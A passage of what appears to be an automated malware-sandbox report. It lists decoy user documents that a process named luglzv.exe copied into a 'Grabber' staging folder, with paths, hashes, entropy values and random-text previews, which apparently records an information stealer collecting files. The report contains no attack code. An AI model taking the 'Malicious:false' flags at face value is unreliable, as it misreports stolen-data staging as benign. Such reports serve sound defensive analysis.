Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\NWTVCDUMOB.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.696250160603532
                                                                  Encrypted:false
                                                                  SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                  MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                  SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                  SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                  SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                  Malicious:false
                                                                  Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\VLZDGUKUTZ.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\VLZDGUKUTZ\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\YPSIACHYXW.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                  C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Documents\ZBEDCJPBEY.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\luglzv.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
